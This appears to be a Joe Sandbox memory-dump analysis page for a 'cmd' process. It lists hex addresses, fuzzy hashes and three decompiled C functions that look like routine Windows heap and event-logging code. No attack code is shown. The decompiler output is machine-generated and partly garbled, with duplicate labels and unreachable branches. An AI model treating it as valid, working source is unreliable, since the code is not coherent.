0x0379293d
0x03792940
0x03792944
0x03792944
0x03792948
0x0379294a
0x03792950
0x03792953
0x03792958
0x00000000
0x00000000
0x0379295a
0x03792962
0x03792965
0x03792976
0x03792978
0x037929e0
0x037929e4
0x037929e6
0x037929e8
0x037929eb
0x03792993
0x03792993
0x00000000
0x03792993
0x037929ed
0x037929ef
0x00000000
0x00000000
0x037929f1
0x00000000
0x037929f1
0x0379297a
0x0379299b
0x0379299d
0x037929f5
0x037929fb
0x037929fb
0x03792a00
0x03792a04
0x03792a04
0x03792a06
0x03792a13
0x03792a13
0x03792a18
0x03792a44
0x03792a44
0x03792a44
0x03792a46
0x03792a50
0x03792a5a
0x03792a5e
0x03792a99
0x03792a9e
0x03792aa0
0x03792a70
0x03792a70
0x03792a72
0x03792a75
0x03792a82
0x03792a89
0x03792a89
0x03792a7a
0x03792a7f
0x03792a7f
0x03792a7f
0x00000000
0x03792a7f
0x03792aa4
0x03792aa4
0x03792ab6
0x03792abd
0x03792ac0
0x03792ac4
0x03792ac6
0x03792ac9
0x03792acf
0x03792ad1
0x03792ad3
0x03792ad3
0x03792ad3
0x03792acf
0x03792ad6
0x03792ad9
0x03792adb
0x03792add
0x03792af9
0x03792af9
0x03792aff
0x03792adf
0x03792adf
0x03792ae7
0x03792aea
0x03792aef
0x03792af4
0x03792af4
0x03792b01
0x03792b05
0x03792b08
0x03792b08
0x03792b0d
0x03792b11
0x03792b1b
0x03792b20
0x00000000
0x03792b11
0x03792a60
0x03792a61
0x03792a6b
0x00000000
0x03792a6b
0x03792a1f
0x03792a25
0x03792a25
0x03792a27
0x03792a38
0x03792a3d
0x03792a3d
0x03792a3f
0x03792a3f
0x00000000
0x03792a3f
0x03792a2c
0x03792a2c
0x03792a31
0x00000000
0x00000000
0x03792a36
0x03792a36
0x00000000
0x03792a36
0x03792a0c
0x00000000
0x03792a0c
0x037929a1
0x037929a4
0x037929a4
0x037929b0
0x037929b5
0x037929b9
0x00000000
0x037929bf
0x037929c3
0x037929c6
0x037929c6
0x037929cd
0x037929d3
0x037929d8
0x00000000
0x037929d8
0x037929b9
0x03792980
0x03792983
0x03792990
0x00000000
0x03792989
0x03792989
0x0379298c
0x0379298c
0x03792995
0x03792995
0x03792999
0x03792999
0x00000000
0x03792999

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c5d99a02f3475a089889df727e68f75866a499fde26f0fa6d97b67804f15f0f
Instruction ID: 4714577eeb58b280840a00e3e67a706dcf8090008fc05ff062888a3485b1deff
Opcode Fuzzy Hash: 5c5d99a02f3475a089889df727e68f75866a499fde26f0fa6d97b67804f15f0f
Instruction Fuzzy Hash: AC71D976A0020EABEF14EF69D88076EF7F9EF44320F188A6AD855DB281DB34D945C750

Uniqueness

Uniqueness Score: -1.00%

Function 0375B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0375B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x37b7b9c; // 0x0
				_t124 = L036E4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03709800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E037095B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E037095D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L036E77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03709910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E037095D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x37b7b9c; // 0x0
									_t92 = L036E4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03709910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E036CA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0375E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0375E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E037095B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0375b8d9
0x0375b8e4
0x00000000
0x0375b8e6
0x0375b8f3
0x0375b8f5
0x0375b8f5
0x0375b8f8
0x0375b920
0x0375b924
0x0375b936
0x0375b939
0x0375b93d
0x0375b948
0x0375b9a0
0x0375b9a0
0x0375b9a4
0x0375b9bf
0x0375b9c4
0x0375b9c6
0x0375b9cd
0x0375b9d1
0x0375bad4
0x0375bad8
0x0375bada
0x0375badc
0x0375badc
0x0375badf
0x0375bae0
0x0375bae2
0x0375bae4
0x0375baec
0x0375baee
0x0375baf0
0x0375baf0
0x0375baec
0x0375bafb
0x0375bafc
0x0375bafe
0x0375bb01
0x0375bb01
0x00000000
0x0375bb06
0x0375b9d7
0x0375b9db
0x0375b9db
0x0375b9de
0x0375b9de
0x0375b9e4
0x0375b9e7
0x0375b9ea
0x0375b9ec
0x0375b9ef
0x0375b9f3
0x0375ba1b
0x0375ba1b
0x0375ba23
0x0375ba24
0x0375ba27
0x0375ba2a
0x0375ba2b
0x0375ba2e
0x0375ba30
0x0375ba37
0x0375ba3f
0x0375ba9c
0x0375baa2
0x0375bb13
0x0375bb15
0x0375baae
0x0375baae
0x0375bab3
0x0375bab5
0x0375baba
0x0375bac8
0x0375bac8
0x0375baba
0x0375bacd
0x0375bacf
0x00000000
0x0375bacf
0x0375bb1a
0x00000000
0x0375bb1c
0x0375baa7
0x0375bb11
0x00000000
0x0375bb11
0x0375baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0375ba41
0x0375ba41
0x0375ba41
0x0375ba58
0x0375ba5d
0x0375ba62
0x00000000
0x00000000
0x0375ba64
0x0375ba67
0x0375ba68
0x0375ba69
0x0375ba6c
0x0375ba6f
0x0375ba71
0x0375ba78
0x0375ba80
0x00000000
0x00000000
0x0375ba90
0x0375ba90
0x0375ba97
0x00000000
0x0375ba97
0x0375b9f5
0x0375b9f7
0x0375b9f7
0x0375b9fa
0x0375ba03
0x0375ba07
0x0375ba0c
0x0375ba10
0x0375ba17
0x00000000
0x0375b9f7
0x0375b9a6
0x0375b9a8
0x0375b9af
0x0375b9b3
0x00000000
0x00000000
0x0375b9b9
0x00000000
0x0375b9b9
0x0375b94d
0x0375b98f
0x0375b995
0x0375b999
0x0375b960
0x0375b967
0x0375b968
0x0375b96a
0x00000000
0x0375b96a
0x0375b99b
0x0375b99e
0x00000000
0x00000000
0x00000000
0x0375b99e
0x0375b951
0x0375b954
0x0375b95a
0x0375b95e
0x0375b972
0x0375b979
0x0375b97d
0x0375b97f
0x0375b980
0x0375b982
0x0375b984
0x00000000
0x0375b984
0x00000000
0x0375b926
0x00000000
0x0375b926

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966129f01b94c7895360511a1083ece612a7682103a47da7d25cb0c802163484
Instruction ID: f07d4800df780a2f98043e27f2dc242f9e998285a6df5fa603bd253056bb060e
Opcode Fuzzy Hash: 966129f01b94c7895360511a1083ece612a7682103a47da7d25cb0c802163484
Instruction Fuzzy Hash: 0F710F36200705EFDB39CF25C889F66BBE5EB40720F284528FA558B6E0DBB4E945DB50

Uniqueness

Uniqueness Score: -1.00%

Function 03746DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E03746DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E03746B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E036E7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E03709AE0();
					_t87 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0374795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0374795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0374795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0374795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L036E4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E03746B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E03746B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E03746B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E03746B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E036E7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E03709AE0();
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L036E2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L036E2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L036E2400( &_v52);
							}
							if(_v28 >= 0) {
								return L036E2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x03746dd4
0x03746dde
0x03746de1
0x03746de3
0x03746de6
0x03746de9
0x03746dec
0x03746def
0x03746df2
0x03746df5
0x03746dfe
0x03746e04
0x03746e09
0x03746e0d
0x03746e18
0x03746e1b
0x03746e22
0x03746e2d
0x03746e30
0x03746e36
0x03746e42
0x03746e4d
0x03746e50
0x03746e55
0x03746e5c
0x03746e6e
0x03746e5e
0x03746e67
0x03746e67
0x03746e73
0x03746e74
0x03746e77
0x03746e7c
0x03746e7d
0x03746e8e
0x03746e93
0x03746e9c
0x03746ea8
0x03746eab
0x03746eac
0x03746eb3
0x03746ecd
0x03746edc
0x03746ee2
0x03746ee5
0x03746ef2
0x03746efb
0x03746f01
0x03746f06
0x03746f0b
0x03746f11
0x03746f1a
0x03746f22
0x03746f26
0x03746f26
0x03746f33
0x03746f41
0x03746f44
0x03746f47
0x03746f54
0x03746f65
0x03746f77
0x03746f7c
0x03746f82
0x03746f91
0x03746f99
0x03746fa3
0x03746fae
0x03746fae
0x03746fba
0x03746fbb
0x03746fbc
0x03746fc1
0x03746fc2
0x03746fd3
0x03746fd8
0x03746fd8
0x03746fdf
0x03746fe8
0x03746fee
0x03746fee
0x03746ff5
0x03746ffb
0x03746ffb
0x03747004
0x00000000
0x0374700a
0x03747004
0x03746eb3
0x03746e9c
0x03747015

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 49556ab9175ce6d82631277dbda18f05cc08d7c27687d61b1be7b7bfb3b8656d
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 4F717A76A00219EFCB15DFA9C984EAEFBB9FF48700F144569E505AB250DB30EA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03781002 Relevance: .2, Instructions: 198
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E03781002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x37b5898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x37b58b0 = _t128;
								 *0x37b58b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x37b58b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x37b58bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x37b58bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x37b58b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x37b5898 = 7;
										return _t75;
									} else {
										 *0x37b5898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x37b5898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}

0x03781002
0x0378100c
0x0378100f
0x03781012
0x03781018
0x00000000
0x0378102e
0x03781030
0x00000000
0x03781032
0x03781032
0x03781038
0x03781038
0x0378121e
0x037811ff
0x03781205
0x03781207
0x0378120c
0x0378120e
0x03781210
0x03781212
0x03781212
0x03781210
0x0378121c
0x0378121c
0x03781228
0x03781228
0x0378101c
0x0378101c
0x0378101c
0x0378101f
0x03781022
0x03781025
0x0378102c
0x0378102c
0x00000000
0x0378102c
0x03781027
0x0378102a
0x0378103f
0x0378103f
0x03781042
0x03781044
0x03781047
0x03781049
0x0378104c
0x0378104e
0x03781088
0x03781088
0x0378108a
0x0378108d
0x0378108f
0x03781091
0x03781091
0x03781093
0x03781095
0x03781097
0x037810c8
0x037810cb
0x037810ce
0x037810d0
0x037810f4
0x037810f4
0x037810fa
0x03781100
0x03781102
0x03781150
0x03781150
0x03781154
0x03781167
0x0378116a
0x0378116a
0x03781156
0x03781156
0x03781158
0x0378115b
0x0378115d
0x0378115f
0x0378115f
0x0378115f
0x03781162
0x03781162
0x0378116c
0x0378116f
0x03781171
0x0378117b
0x0378117b
0x0378117d
0x03781183
0x03781183
0x03781186
0x03781188
0x03781199
0x0378118a
0x0378118a
0x0378118c
0x0378118f
0x03781191
0x03781191
0x03781191
0x03781194
0x03781194
0x0378119c
0x037811a2
0x037811a8
0x037811ac
0x037811af
0x037811c7
0x037811b1
0x037811b1
0x037811b4
0x037811b7
0x037811b9
0x037811b9
0x037811b9
0x037811bc
0x037811c2
0x037811c2
0x037811cb
0x037811ce
0x037811d4
0x037811e7
0x037811ed
0x037811ef
0x00000000
0x00000000
0x037811f1
0x00000000
0x037811d6
0x037811d6
0x00000000
0x037811d6
0x037811d4
0x03781104
0x03781106
0x00000000
0x00000000
0x03781108
0x0378110c
0x0378111d
0x0378110e
0x0378110e
0x03781110
0x03781113
0x03781115
0x03781115
0x03781115
0x03781118
0x03781118
0x03781126
0x0378113a
0x0378113d
0x0378113f
0x00000000
0x03781141
0x03781141
0x00000000
0x03781141
0x0378113f
0x037810d6
0x037810d9
0x037810dd
0x037810e3
0x037810e6
0x037810e9
0x00000000
0x00000000
0x037810ee
0x037810f0
0x037810f2
0x00000000
0x00000000
0x00000000
0x037810f2
0x00000000
0x03781099
0x03781099
0x0378109c
0x0378109c
0x0378109e
0x037810a0
0x037810b3
0x037810a2
0x037810a2
0x037810a4
0x037810a7
0x037810a9
0x037810ab
0x037810ab
0x037810ab
0x037810ae
0x037810ae
0x037810b6
0x037810b9
0x00000000
0x00000000
0x037810be
0x037810c1
0x037810c3
0x00000000
0x00000000
0x00000000
0x037810c3
0x037810c5
0x00000000
0x037810c5
0x03781097
0x03781050
0x03781053
0x03781056
0x03781059
0x0378105c
0x0378105e
0x03781060
0x03781062
0x03781064
0x03781064
0x03781062
0x03781066
0x03781069
0x0378106b
0x0378106d
0x0378106f
0x03781076
0x03781076
0x03781076
0x00000000
0x03781076
0x03781071
0x03781074
0x00000000
0x00000000
0x00000000
0x03781074
0x03781079
0x03781079
0x0378107b
0x0378107b
0x0378107f
0x03781082
0x03781085
0x00000000
0x03781085
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49737cafee3aac2a7bc1293f8c182addef5d4c4465ae477e49e1c59aac9db0ed
Instruction ID: 575a750382a305797805ecf24c400f430efdd9ff9ccdc0910d64156e17103358
Opcode Fuzzy Hash: 49737cafee3aac2a7bc1293f8c182addef5d4c4465ae477e49e1c59aac9db0ed
Instruction Fuzzy Hash: C271C234A40766CBCB24EF56D88067AF3F1FF44700BA8486ED896CB640E775E952DB50

Uniqueness

